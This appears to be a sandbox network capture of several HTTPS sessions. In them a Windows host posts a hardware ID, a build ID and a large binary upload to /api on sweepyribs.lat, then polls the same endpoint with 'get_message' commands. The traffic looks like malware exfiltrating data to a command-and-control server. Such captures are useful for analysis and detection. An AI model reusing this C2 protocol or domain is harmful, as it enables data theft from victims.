2024-12-17 05:04:22 UTC	1045	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3l2r3urn64bj5jr3p5lob60ddv; expires=Fri, 11-Apr-2025 22:51:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2FNVj63w49eLqEHjW2KX%2FqKSf2kuqRJHAbcPSNcmG4iG0vBUT0hElpXkmMDUHPXl2EaPrJNkX7WLSCYgzPNHXJA0dc2TK6r0N%2Fn%2Fkox2gsO%2FknWexNMbgGoDilcJNjgU1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f391853435c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1691&rtt_var=646&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21457&delivery_rate=1679125&cwnd=248&unsent_bytes=0&cid=35f65bd5794c68ec&ts=1236&x=0"
2024-12-17 05:04:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	50058	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:24 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JOIYIG6IK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1284 Host: sweepyribs.lat
2024-12-17 05:04:24 UTC	1284	OUT	Data Raw: 2d 2d 4a 4f 49 59 49 47 36 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 4f 49 59 49 47 36 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 4f 49 59 49 47 36 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 4f 49 59 49 47 36 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --JOIYIG6IKContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--JOIYIG6IKContent-Disposition: form-data; name="pid"1--JOIYIG6IKContent-Disposition: form-data; name="lid"PsFKDg--pablo--JOIYIG6IKContent-Disp
2024-12-17 05:04:25 UTC	1037	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uhv1u1snkodggucs0q6k40oidj; expires=Fri, 11-Apr-2025 22:51:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JR6SLu2uWKyoJYHvykna9h4MJvE%2F%2BLxBmz0iVFK3472K2fXgy6XG%2BfeUJUAl3sh1C1Bb49bZSQL0dPsrSy9UqUP1yWmC22LhFHoYCnxE2hR5YduYhMJpSNJUVXG80t17hQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f494dfc0f46-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1695&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2190&delivery_rate=1616832&cwnd=226&unsent_bytes=0&cid=2b2fa070efae608f&ts=797&x=0"
2024-12-17 05:04:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	50069	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:27 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4URP9LP9QUW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29532 Host: sweepyribs.lat
2024-12-17 05:04:27 UTC	15331	OUT	Data Raw: 2d 2d 34 55 52 50 39 4c 50 39 51 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 55 52 50 39 4c 50 39 51 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 55 52 50 39 4c 50 39 51 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 55 52 50 39 4c 50 39 51 55 57 0d 0a 43 6f 6e 74 Data Ascii: --4URP9LP9QUWContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--4URP9LP9QUWContent-Disposition: form-data; name="pid"1--4URP9LP9QUWContent-Disposition: form-data; name="lid"PsFKDg--pablo--4URP9LP9QUWCont
2024-12-17 05:04:27 UTC	14201	OUT	Data Raw: c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da Data Ascii: o73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1mX]rT
2024-12-17 05:04:28 UTC	1046	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g99dseqa492i5f1mo8vb5een93; expires=Fri, 11-Apr-2025 22:51:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ldbsabt9LpgkSg%2B2bTIoY%2Bdrr9tRVT1e5d9HRiJ%2FyvY2hMwT4taj7%2Bag9CYW0uT%2BfH0tUMlGqdBBvpQKmzyTcG63g4yz5pEb9m7YdrpDzNvFoae9H9sfVOtdTv23AKO%2B7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f5cea3078db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1842&rtt_var=695&sent=19&recv=34&lost=0&retrans=0&sent_bytes=2833&recv_bytes=30507&delivery_rate=1585233&cwnd=237&unsent_bytes=0&cid=c2d28cbf11025118&ts=802&x=0"
2024-12-17 05:04:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	50073	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:29 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sweepyribs.lat
2024-12-17 05:04:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 05:04:29 UTC	1040	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fbee3uansqrt6pua51odqqp2fk; expires=Fri, 11-Apr-2025 22:51:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJHYVzcgTZa0Lw8dBymbT4%2BmPAbEdmBu9WyCbj5xFbj%2FbHmh4BVX4GzxTC%2FSxZhGTK3Pnz2MjgzxYRxpzaMcSDwD0R5VHvb7hM9pvIsj9OK%2F9XljbVG4WEgyx95dJIaZgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f67abf84307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1699&rtt_var=650&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1666666&cwnd=237&unsent_bytes=0&cid=ab6071433cabba69&ts=732&x=0"
2024-12-17 05:04:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-17 05:04:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	50074	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:29 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: sweepyribs.lat
2024-12-17 05:04:29 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=5C324A728B8242D2AC8923850305D13E
2024-12-17 05:04:30 UTC	1036	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k39ee74e60qjl6ul9t0aei74l2; expires=Fri, 11-Apr-2025 22:51:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSeVCoYxy%2BMnWzJfJTdk2%2BqYLesB8eCU0j6lMRsd4ZEv4lVrCFGfrdHMsSepN173oCrCd431CLXZgJgG1HDt4snm5BXFjb3kIb0F4tk5eyVm4ocbblCZA6HQnY5%2FwtcCeA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f6a7ef47c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1781&rtt_var=679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=980&delivery_rate=1600000&cwnd=252&unsent_bytes=0&cid=1e8311a0e15d30f7&ts=754&x=0"
2024-12-17 05:04:30 UTC	214	IN	Data Raw: 64 30 0d 0a 73 77 45 58 4c 57 47 79 45 62 33 72 6a 74 68 65 53 34 66 7a 2f 50 42 46 61 43 63 63 68 33 62 4e 31 51 56 32 63 4e 79 31 31 33 33 6f 65 6a 56 59 51 34 67 7a 31 5a 2f 36 71 47 51 58 71 4b 2f 54 77 58 31 64 43 53 36 32 51 2b 50 6b 4e 45 56 65 37 59 4f 4c 55 74 78 6e 63 58 46 4f 31 6e 54 62 78 65 75 67 4f 32 6d 72 30 5a 71 45 5a 31 49 58 4d 4b 55 54 37 2b 38 31 43 31 79 6e 6c 36 4a 66 69 53 4e 2f 57 52 58 43 4b 2b 48 45 30 76 64 76 63 37 4c 64 7a 73 46 77 52 68 59 74 74 46 6a 38 34 31 6c 5a 41 36 6a 51 74 68 44 76 4c 6d 56 4d 44 39 5a 2b 30 4d 58 72 6f 44 74 70 71 39 47 61 68 47 64 53 46 7a 43 6c 45 2b 2f 76 4e 51 73 74 0d 0a Data Ascii: d0swEXLWGyEb3rjtheS4fz/PBFaCcch3bN1QV2cNy1133oejVYQ4gz1Z/6qGQXqK/TwX1dCS62Q+PkNEVe7YOLUtxncXFO1nTbxeugO2mr0ZqEZ1IXMKUT7+81C1ynl6JfiSN/WRXCK+HE0vdvc7LdzsFwRhYttFj841lZA6jQthDvLmVMD9Z+0MXroDtpq9GahGdSFzClE+/vNQst
2024-12-17 05:04:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	50075	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:31 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: sweepyribs.lat
2024-12-17 05:04:31 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-17 05:04:31 UTC	1044	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0l4kntk0mqbapljgqef7k23pnc; expires=Fri, 11-Apr-2025 22:51:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fdfl%2FIEvuMYPmlXvpLKd%2FtBr7X6gEls%2B1hwAmA2KO81plQ10LlfRFO6Rm39i2p7wSpb%2FDm2B5N1hhdeZzrbVac8yu%2BvLZ8ZwXY70N8hhFZ%2BctmmkDNFXlGQj7Nw9wBut5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f73fb207c6f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1582655&cwnd=212&unsent_bytes=0&cid=4f39e142f02b3ddc&ts=722&x=0"
2024-12-17 05:04:31 UTC	325	IN	Data Raw: 31 64 32 62 0d 0a 55 53 32 41 42 76 51 7a 55 6b 39 4d 6b 76 49 4d 36 59 69 6a 6f 79 32 49 36 38 56 33 7a 54 63 77 54 41 7a 49 45 66 74 73 37 56 41 71 44 2f 59 6b 7a 67 64 2b 62 54 2f 33 30 44 61 64 2b 74 62 47 41 61 71 4b 6f 56 58 33 55 56 45 67 66 36 30 39 32 52 71 41 63 6d 74 4c 34 57 71 48 56 6e 35 74 4b 65 72 51 4e 72 4c 7a 67 63 5a 44 71 74 48 6e 45 71 64 56 55 53 42 75 71 58 71 55 48 49 45 7a 4f 55 48 6e 62 70 46 51 4e 69 34 67 2f 35 64 70 6a 4f 6e 4a 7a 55 54 6c 67 36 68 56 34 52 56 56 4e 69 37 79 4d 37 59 4a 6d 54 45 63 54 50 4e 74 31 6b 35 2b 4e 47 37 33 6e 43 37 54 71 73 4c 47 54 2b 53 4e 6f 52 79 6c 58 31 67 6f 62 36 78 37 69 77 57 4c 4f 44 6c 50 35 47 2b 62 57 53 49 6a 4b 76 69 63 62 34 62 70 67 59 38 50 37 5a 48 6e 54 65 38 47 59 43 31 2f 75 Data Ascii: 1d2bUS2ABvQzUk9MkvIM6Yijoy2I68V3zTcwTAzIEfts7VAqD/Ykzgd+bT/30Dad+tbGAaqKoVX3UVEgf6092RqAcmtL4WqHVn5tKerQNrLzgcZDqtHnEqdVUSBuqXqUHIEzOUHnbpFQNi4g/5dpjOnJzUTlg6hV4RVVNi7yM7YJmTEcTPNt1k5+NG73nC7TqsLGT+SNoRylX1gob6x7iwWLODlP5G+bWSIjKvicb4bpgY8P7ZHnTe8GYC1/u
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 5a 44 38 71 5a 70 42 61 37 57 45 4e 75 63 65 52 71 32 51 6d 44 63 6d 73 50 35 47 71 58 58 44 41 2f 4a 76 75 62 61 35 6e 68 79 4d 78 43 36 6f 53 74 47 71 78 56 56 53 52 6b 70 58 6d 64 41 34 49 30 4d 30 2b 69 4b 74 5a 57 4b 47 31 32 73 4c 4e 72 6d 2b 33 4e 31 77 33 51 79 62 68 62 74 68 56 56 49 69 37 79 4d 35 45 4c 6a 44 45 34 51 4f 46 73 6e 55 4d 77 50 79 6a 39 6c 58 79 4e 37 38 2f 4c 54 50 69 44 71 52 4f 73 58 46 6b 6e 61 36 31 33 32 55 44 50 4e 53 73 50 75 69 53 33 58 44 73 68 4a 4f 65 51 4c 70 53 6b 32 49 46 49 35 73 6e 2f 56 61 74 55 56 69 39 71 70 48 32 64 41 6f 6b 38 50 6b 44 6b 62 70 5a 57 4f 69 55 6d 38 5a 31 6c 68 4f 72 45 7a 45 76 73 68 61 59 51 37 78 73 53 4b 58 62 71 4b 39 6b 67 69 44 45 68 44 64 64 6e 6d 46 38 33 4f 32 37 76 33 6e 66 4c 37 63 Data Ascii: ZD8qZpBa7WENuceRq2QmDcmsP5GqXXDA/Jvuba5nhyMxC6oStGqxVVSRkpXmdA4I0M0+iKtZWKG12sLNrm+3N1w3QybhbthVVIi7yM5ELjDE4QOFsnUMwPyj9lXyN78/LTPiDqROsXFkna6132UDPNSsPuiS3XDshJOeQLpSk2IFI5sn/VatUVi9qpH2dAok8PkDkbpZWOiUm8Z1lhOrEzEvshaYQ7xsSKXbqK9kgiDEhDddnmF83O27v3nfL7c
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 6a 4b 59 66 70 52 55 63 62 6d 6d 79 4d 38 46 4f 76 69 55 34 44 64 64 6e 6d 46 38 33 4f 32 37 76 33 6e 66 4c 37 63 32 42 46 36 71 45 72 78 43 71 57 6c 4d 6b 59 4b 39 35 6c 51 61 42 4d 53 46 41 35 6d 53 61 57 54 6f 67 49 50 53 59 5a 34 44 68 78 38 46 4f 34 4d 6e 70 56 61 68 4e 45 6e 59 75 6e 6e 53 56 41 34 42 77 42 6b 7a 73 61 70 46 48 63 44 4a 67 36 64 42 70 68 36 71 5a 67 55 50 6a 69 61 77 66 71 31 56 56 49 32 75 70 64 4a 6f 44 69 44 67 39 53 4f 5a 6f 6e 31 77 32 4c 53 6e 30 6c 58 79 4f 34 38 33 4e 44 36 54 4a 6f 41 33 76 44 52 49 42 61 62 78 77 74 67 32 65 4f 33 4e 51 72 48 33 57 56 6a 78 74 64 72 43 58 61 34 50 68 78 38 6c 50 2b 49 79 70 48 71 35 66 56 43 39 6a 70 6e 57 5a 44 34 38 30 50 30 2f 6c 59 34 52 44 4e 53 73 38 2b 74 41 67 79 2b 33 5a 67 52 65 Data Ascii: jKYfpRUcbmmyM8FOviU4DddnmF83O27v3nfL7c2BF6qErxCqWlMkYK95lQaBMSFA5mSaWTogIPSYZ4Dhx8FO4MnpVahNEnYunnSVA4BwBkzsapFHcDJg6dBph6qZgUPjiawfq1VVI2updJoDiDg9SOZon1w2LSn0lXyO483ND6TJoA3vDRIBabxwtg2eO3NQrH3WVjxtdrCXa4Phx8lP+IypHq5fVC9jpnWZD480P0/lY4RDNSs8+tAgy+3ZgRe
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 66 63 56 55 53 46 6e 70 58 75 52 41 59 41 32 50 55 6e 6b 61 5a 4e 65 4f 6a 38 6d 2f 70 31 6c 68 4f 48 54 77 55 4c 75 68 61 4d 64 70 46 38 53 59 43 36 74 61 39 6c 57 7a 77 63 2b 51 4f 4a 6e 67 42 45 76 59 7a 65 77 6c 32 4c 4c 73 6f 48 4e 51 65 71 47 71 78 6d 6b 58 56 4d 69 59 4b 31 32 6b 41 61 48 49 44 4a 4c 36 6d 57 59 58 6a 45 70 4b 2f 57 55 61 59 2f 73 7a 6f 45 42 71 6f 36 2f 56 66 63 56 66 51 6c 62 36 46 4b 6a 54 70 42 38 4b 67 2f 6c 61 4e 59 4a 63 43 45 74 2f 4a 68 68 6a 65 50 4e 79 30 62 68 68 61 77 52 6f 31 78 58 4b 47 2b 76 64 70 67 4b 67 7a 67 31 54 4f 46 72 6d 56 34 34 62 57 43 77 6c 33 62 4c 73 6f 48 6b 57 4f 47 48 6f 56 57 77 47 30 74 75 61 61 59 7a 77 55 36 44 4f 7a 56 4a 35 32 69 58 56 7a 67 6f 4a 76 53 52 61 49 33 70 7a 73 56 4b 36 34 61 6a Data Ascii: fcVUSFnpXuRAYA2PUnkaZNeOj8m/p1lhOHTwULuhaMdpF8SYC6ta9lWzwc+QOJngBEvYzewl2LLsoHNQeqGqxmkXVMiYK12kAaHIDJL6mWYXjEpK/WUaY/szoEBqo6/VfcVfQlb6FKjTpB8Kg/laNYJcCEt/JhhjePNy0bhhawRo1xXKG+vdpgKgzg1TOFrmV44bWCwl3bLsoHkWOGHoVWwG0tuaaYzwU6DOzVJ52iXVzgoJvSRaI3pzsVK64aj
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 45 38 62 36 64 34 69 77 6d 41 4e 6a 52 44 35 47 75 51 55 44 55 6e 49 76 65 56 5a 59 54 6d 67 59 38 50 37 5a 48 6e 54 65 39 37 57 54 31 35 71 58 32 53 47 4a 52 79 4c 41 48 37 4a 4a 46 64 63 48 56 75 38 35 74 6c 6a 2b 72 4e 77 55 76 6e 69 62 55 61 71 46 4a 62 4a 58 79 67 64 4a 34 46 68 7a 6b 38 53 66 42 6f 6d 45 4d 31 50 7a 79 77 33 69 36 4d 38 6f 47 5a 44 39 79 4f 74 77 57 73 46 32 4d 34 62 62 78 34 6c 41 4c 50 4c 58 31 57 6f 6d 4f 61 45 57 68 74 4b 50 2b 5a 62 59 54 72 79 4d 31 43 37 34 43 69 46 4b 6c 52 57 43 52 75 72 48 57 59 43 34 55 78 4d 6b 58 72 59 35 35 57 4d 7a 39 75 76 74 42 70 6b 36 71 5a 67 57 62 74 6d 36 6b 46 37 30 6f 63 4e 79 36 74 66 39 6c 57 7a 7a 59 35 51 4f 5a 6a 6d 6c 63 31 4b 79 50 78 6e 32 2b 4c 35 63 58 4b 52 75 79 49 71 68 43 69 55 Data Ascii: E8b6d4iwmANjRD5GuQUDUnIveVZYTmgY8P7ZHnTe97WT15qX2SGJRyLAH7JJFdcHVu85tlj+rNwUvnibUaqFJbJXygdJ4Fhzk8SfBomEM1Pzyw3i6M8oGZD9yOtwWsF2M4bbx4lALPLX1WomOaEWhtKP+ZbYTryM1C74CiFKlRWCRurHWYC4UxMkXrY55WMz9uvtBpk6qZgWbtm6kF70ocNy6tf9lWzzY5QOZjmlc1KyPxn2+L5cXKRuyIqhCiU
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 6d 4d 38 46 4f 6a 7a 67 32 52 65 39 6e 6d 56 49 69 4c 43 6a 69 6b 47 4f 42 2b 4d 76 4b 53 75 65 45 71 68 61 70 55 31 6b 69 66 4b 4e 7a 6d 67 58 50 66 48 4e 49 2b 69 54 4f 45 52 4d 36 4f 50 71 58 59 70 33 68 77 4d 4a 5a 35 35 6e 6e 57 2b 39 45 56 54 38 75 38 6d 57 4a 47 59 67 74 66 56 61 69 59 35 6f 52 61 47 30 6f 2b 5a 5a 70 6a 65 54 54 78 45 6e 6c 68 71 34 63 71 31 31 52 4c 6d 71 75 64 4a 77 4e 67 7a 6b 30 54 4f 31 67 6e 31 38 35 49 6d 36 2b 30 47 6d 54 71 70 6d 42 62 76 47 4b 71 78 6a 76 53 68 77 33 4c 71 31 2f 32 56 62 50 50 6a 31 4b 34 6d 36 51 56 54 55 72 4a 50 57 51 5a 59 6a 6c 78 63 64 4c 35 59 6d 73 48 4b 35 54 56 79 52 6c 72 48 36 61 43 49 6c 79 66 51 2f 6c 66 4e 59 4a 63 41 30 31 2f 5a 78 70 79 2f 57 50 32 41 2f 74 68 65 64 4e 37 31 35 65 4b 6d Data Ascii: mM8FOjzg2Re9nmVIiLCjikGOB+MvKSueEqhapU1kifKNzmgXPfHNI+iTOERM6OPqXYp3hwMJZ55nnW+9EVT8u8mWJGYgtfVaiY5oRaG0o+ZZpjeTTxEnlhq4cq11RLmqudJwNgzk0TO1gn185Im6+0GmTqpmBbvGKqxjvShw3Lq1/2VbPPj1K4m6QVTUrJPWQZYjlxcdL5YmsHK5TVyRlrH6aCIlyfQ/lfNYJcA01/Zxpy/WP2A/thedN715eKm
